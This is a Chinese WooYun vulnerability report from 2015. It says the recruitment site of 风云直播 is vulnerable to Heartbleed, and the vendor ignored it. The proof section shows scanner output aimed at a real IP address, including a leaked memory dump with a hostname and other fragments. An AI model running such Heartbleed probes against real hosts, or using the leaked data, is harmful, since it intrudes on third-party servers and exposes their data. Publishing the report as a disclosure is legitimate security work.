当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111866

漏洞标题:风云直播招聘网站存在Heartbleed漏洞

相关厂商:风云直播

漏洞作者: 路人甲

提交时间:2015-05-04 09:59

修复时间:2015-05-09 10:00

公开时间:2015-05-09 10:00

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

风云直播招聘网站存在Heartbleed漏洞 导致数据泄露

详细说明:

http://career.fengyunzhibo.com/


1.png

2.png

漏洞证明:

*] 59.108.99.185:443 - Sending Heartbeat...
[*] 59.108.99.185:443 - Heartbeat response, 46715 bytes
[+] 59.108.99.185:443 - Heartbeat response with leak
[*] 59.108.99.185:443 - Printable info leaked: 3TV'E8_L(+/329/5}auth.corp.ppweb.com.cn#3tspdy/3.1http/1.1uP^^$}yK&#< mFWE(3AU&Uoq*)&TO/TK@gi>3ospG~3thttp/1.1spdy/3.1h2-14uP?S3i9#nP" @@QBAV!|ojI<SP%$Kz3LC http/1.1Ee*9j%#zMvndbU*-Y$Tgp\@0r%z'}_L~JU(]3ZhBu]}@Lc{Nf]|D(i?oBsruaQ"5a+7|p5$_$KyEiC?l78J^0)W<o~dE+|"GuwoDCQf2D+sSn:4ZhjODfV.eT7e/:,`~?>n[oxs/yg$_PAS:L~5)>P+xJ!2wugG ;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2,nb;q=0.2`>EY2@3hn_expire=1430620344.442y~KoEm#HZOj(QAda$6#bmULtT`HXNr32;Jm8uBD%>4MH.4Z?

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-09 10:00

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论